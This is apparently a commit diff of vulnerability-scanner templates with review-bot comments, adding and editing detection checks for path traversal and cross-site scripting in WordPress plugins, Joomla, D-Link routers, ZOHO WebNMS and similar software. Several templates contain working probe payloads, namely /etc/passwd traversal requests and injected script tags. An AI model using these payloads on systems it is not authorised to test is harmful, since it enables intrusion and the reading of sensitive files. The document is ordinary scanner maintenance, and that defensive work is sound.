name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
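Review bot: the `name:` uses `<= 0.9.2`, which includes 0.9.2, while the `description:` says "prior to v.0.9.2", which excludes it. Align the operator in the name with the description (or the reverse) while renaming.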
@ -12,7 +12,7 @@ info:
- http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
classification:
cve-id: CVE-2014-9444
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
requests:
- method: GET

View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2015-1579
cwe-id: CWE-22
metadata:
google-dork: inurl:/wp-content/plugins/revslider
google-query: inurl:/wp-content/plugins/revslider
tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
requests:

View File

@ -0,0 +1,36 @@
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
reference:
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
- https://www.exploit-db.com/exploits/37666/
- https://www.cvedetails.com/cve/CVE-2015-4074
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-4074
cwe-id: CWE-22
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by cs on 2022/09/08
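Review bot: the reference list adds `https://www.cvedetails.com/cve/CVE-2015-4074`, while other hunks in this commit remove `cvedetails.com` links in favour of `nvd.nist.gov`. For consistency, use `https://nvd.nist.gov/vuln/detail/CVE-2015-4074` here instead of the cvedetails entry.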

View File

@ -1,16 +1,16 @@
id: CVE-2015-4127
info:
name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
name: WordPress Church Admin <0.810 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
reference:
- https://www.exploit-db.com/exploits/37112
- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
- https://wordpress.org/plugins/church-admin/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
classification:
cve-id: CVE-2015-4127
tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
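Review bot: the rewritten description reads "via the address parameter via index.php/2015/05/21/church_admin-registration-form/", with "via" twice, and it no longer names the vulnerability class that the old text opened with. Suggest something like "contains a cross-site scripting vulnerability that allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/".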
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -0,0 +1,33 @@
id: CVE-2015-5469
info:
name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
author: 0x_Akoko
severity: high
description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
reference:
- https://www.openwall.com/lists/oss-security/2015/07/10/5
- https://www.cvedetails.com/cve/CVE-2015-5469/
- http://www.vapid.dhs.org/advisory.php?v=133
- http://www.openwall.com/lists/oss-security/2015/07/10/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-5469
cwe-id: CWE-22
tags: cve,cve2015,wp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
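Review bot: The reference list of this new template carries the same oss-security post twice, once as https://www.openwall.com/lists/oss-security/2015/07/10/5 and once as the http:// form, and has no nvd.nist.gov entry like the other templates touched in this commit; keep one openwall link and add the NVD one. The name spells "Wordpress" where the rest of the commit uses "WordPress", and the tags omit wordpress and wp-plugin, which the CVE-2015-4127 plugin template in this commit carries.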

View File

@ -0,0 +1,32 @@
id: CVE-2015-7245
info:
name: D-Link DVG-N5402SP - Path Traversal
author: 0x_Akoko
severity: high
description: |
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
reference:
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-7245
cwe-id: CWE-22
tags: cve,cve2015,dlink,lfi,packetstorm,edb
requests:
- raw:
- |
POST /cgibin/webproc HTTP/1.1
Host: {{Hostname}}
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
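Review bot: In the raw POST body the traversal parameter is written as *errorpage* with literal asterisks, which look like emphasis markup carried over from the advisory; the description names the parameter errorpage, so as written the request sends a differently named field. The body also contains var%&objaction=auth, where the bare % is not valid percent-encoding and should be checked against the reference. The only matcher is the regex "root:.*:0:0:"; consider the tighter "root:[x*]:0:0" used by the other /etc/passwd templates in this commit, plus a status 200 matcher.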

View File

@ -1,7 +1,7 @@
id: CVE-2016-1000141
info:
name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.

View File

@ -7,7 +7,6 @@ info:
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
reference:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
tags: fileupload,kev,edb,cve,cve2016,apache,activemq
tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
requests:
- raw:

View File

@ -0,0 +1,32 @@
id: CVE-2016-6601
info:
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
reference:
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
- https://www.exploit-db.com/exploits/40229/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-6601
cwe-id: CWE-22
tags: edb,cve,cve2016,zoho,lfi,webnms
requests:
- method: GET
path:
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
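Review bot: The regex matcher "root:.*:0:0" is looser than the "root:[x*]:0:0" pattern that the CVE-2015-4074 and CVE-2015-5469 templates in this commit use, since the greedy .* accepts any text between "root:" and ":0:0" on a line. Suggest the bracketed form for consistency and fewer false positives, and end the description sentence with a period.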

View File

@ -1,15 +1,15 @@
id: CVE-2017-11629
info:
name: FineCms 5.0.10 - Cross Site Scripting
name: FineCMS <=5.0.10 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
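Review bot: The NVD reference keeps a trailing slash (https://nvd.nist.gov/vuln/detail/CVE-2017-11629/) while the other NVD links visible in this commit have none. Since the reference list is being reordered here anyway, drop the slash so the links are uniform.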
@ -39,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -19,7 +19,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: title:"Apache Tomcat"
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
requests:
- method: PUT
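Review bot: The tags line gains fileupload but not intrusive, although the request that follows uses method: PUT and the other file-upload templates retagged in this commit (for example CVE-2016-3088 and CVE-2017-15715) receive intrusive in the same change. If this template writes a file to the target, add intrusive as well so that runs which exclude that tag skip it.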

View File

@ -1,7 +1,7 @@
id: CVE-2017-14651
info:
name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-15715
cwe-id: CWE-20
tags: apache,httpd,fileupload,vulhub,cve,cve2017
tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
requests:
- raw:

View File

@ -17,7 +17,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
tags: cve,cve2017,auth-bypass,netgear,router
tags: cve,cve2017,auth-bypass,netgear,router,kev
requests:
- method: GET

View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: http.title:"PhpCollab"
tags: cve2017,phpcollab,rce,fileupload,edb,cve
tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
requests:
- raw:

View File

@ -1,7 +1,7 @@
id: CVE-2018-11709
info:
name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.

View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
requests:
- raw:

View File

@ -0,0 +1,42 @@
id: CVE-2018-16139
info:
name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
author: atomiczsec
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
reference:
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-16139
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16139
cwe-id: CWE-79
metadata:
verified: true
shodan-query: title:"Bibliopac"
tags: cve,cve2018,xss,bibliopac,bibliosoft
requests:
- method: GET
path:
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>prompt(document.domain)</script>.xrf'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
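Review bot: The name of this new template uses "Cross Site Scripting" while the rest of this commit renames templates to the hyphenated "Cross-Site Scripting", and the description has a doubled "to to" before bin/wxis.exe/bibliopac/. The description lists both db and action as injectable, but the request only exercises db; either say so in the description or add a second path for action.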

View File

@ -1,14 +1,15 @@
id: CVE-2018-19386
info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
reference:
- https://www.cvedetails.com/cve/CVE-2018-19386/
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
- type: word
words:
- '<a href="javascript:alert(document.domain)//'
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,16 @@
id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
reference:
- http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
- http://seclists.org/fulldisclosure/2018/Nov/58
- http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-19439
- http://seclists.org/fulldisclosure/2018/Nov/58
remediation: Fixed in later versions including 5.4.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +27,5 @@ requests:
words:
- "<script>alert(1337)</script><!--</TITLE>"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
reference:
- https://github.com/domainmod/domainmod/issues/81
- https://www.exploit-db.com/exploits/45941/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19749
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -49,3 +50,5 @@ requests:
- 'contains(all_headers_3, "text/html")'
- "contains(body_3, '><script>alert(document.domain)</script></a>')"
condition: and
# Enhanced by mp on 2022/08/31

View File

@ -5,11 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
reference:
- https://www.exploit-db.com/exploits/45947/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
- https://github.com/domainmod/domainmod/issues/83
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -58,3 +58,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -5,11 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
- https://github.com/domainmod/domainmod/issues/84
- https://www.exploit-db.com/exploits/45949/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
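Review bot: The new description narrows the affected input from "notes,registrar field" to "notes field for Registrar", which drops the registrar field as an injection point. If the original meant both fields, word it as "via the notes and registrar fields of assets/add/registrar.php" so the rewrite does not change the scope of the finding.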
@ -57,3 +57,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,15 @@
id: CVE-2018-19877
info:
name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
reference:
- https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
- https://www.exploit-db.com/exploits/45958/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19877
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
reference:
- https://www.exploit-db.com/exploits/45959
- https://github.com/domainmod/domainmod/issues/85
- https://nvd.nist.gov/vuln/detail/CVE-2018-19892
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
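Review bot: The rewritten description keeps the path /domain//admin/dw/add-server.php with its doubled slash and the plural "DisplayName parameters" for what is named as a single parameter. Since the sentence is being rewritten, check the path against the linked issue and use the singular "DisplayName parameter".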
@ -56,3 +57,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
reference:
- https://www.exploit-db.com/exploits/46375/
- https://github.com/domainmod/domainmod/issues/87
- https://nvd.nist.gov/vuln/detail/CVE-2018-19914
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -49,3 +50,5 @@ requests:
- 'contains(all_headers_3, "text/html")'
- 'contains(body_3, "><script>alert(document.domain)</script></a>")'
condition: and
# Enhanced by mp on 2022/08/31

View File

@ -17,9 +17,9 @@ info:
cve-id: CVE-2018-20526
cwe-id: CWE-434
metadata:
google-dork: intitle:"Roxy file manager"
google-query: intitle:"Roxy file manager"
verified: "true"
tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
requests:
- raw:
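Review bot: While google-dork is renamed to google-query in this metadata block, verified is left as the quoted string "true", whereas the new CVE-2018-16139 template in this commit uses the boolean verified: true. Normalise to the unquoted form so the field has one type across templates.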

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-2628
cwe-id: CWE-502
tags: cve,cve2018,oracle,weblogic,network,deserialization
tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
network:
- inputs:

View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2018-5715
cwe-id: CWE-79
metadata:
google-dork: intext:"SugarCRM Inc. All Rights Reserved"
google-query: intext:"SugarCRM Inc. All Rights Reserved"
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
tags: sugarcrm,xss,edb,cve,cve2018

View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2019-1010287
cwe-id: CWE-79
metadata:
google-dork: inurl:"/timesheet/login.php"
google-query: inurl:"/timesheet/login.php"
tags: cve,cve2019,timesheet,xss
requests:

View File

@ -7,8 +7,8 @@ info:
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
- https://www.cvedetails.com/cve/CVE-2019-1010290
- http://dev.cmsmadesimple.org/project/files/729
- https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1

View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2019-12593
cwe-id: CWE-22
metadata:
google-dork: Powered By IceWarp 10.4.4
google-query: Powered By IceWarp 10.4.4
shodan-query: title:"icewarp"
tags: cve,cve2019,lfi,icewarp

View File

@ -4,9 +4,10 @@ info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: medium
description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
reference:
- https://www.exploit-db.com/exploits/47247
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,14 @@
id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
reference:
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
- https://nvd.nist.gov/vuln/detail/CVE-2019-15501
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,15 @@
id: CVE-2019-15811
info:
name: DomainMOD 4.13.0 - Cross-Site Scripting
name: DomainMOD <=4.13.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
reference:
- https://www.exploit-db.com/exploits/47325
- https://github.com/domainmod/domainmod/issues/108
- https://nvd.nist.gov/vuln/detail/CVE-2019-15811
- https://zerodays.lol/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -44,3 +45,5 @@ requests:
- 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
- 'contains(body_2, "DomainMOD")'
condition: and
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,14 @@
id: CVE-2019-15889
info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
- https://wordpress.org/plugins/download-manager/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2019-15889
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,13 +1,14 @@
id: CVE-2019-16332
info:
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
reference:
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2019-16332
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,15 +1,15 @@
id: CVE-2019-16525
info:
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
name: WordPress Checklist <1.1.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
- https://wordpress.org/plugins/checklist/#developers
- https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
- https://plugins.trac.wordpress.org/changeset/2155029/
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,16 +1,16 @@
id: CVE-2019-16931
info:
name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
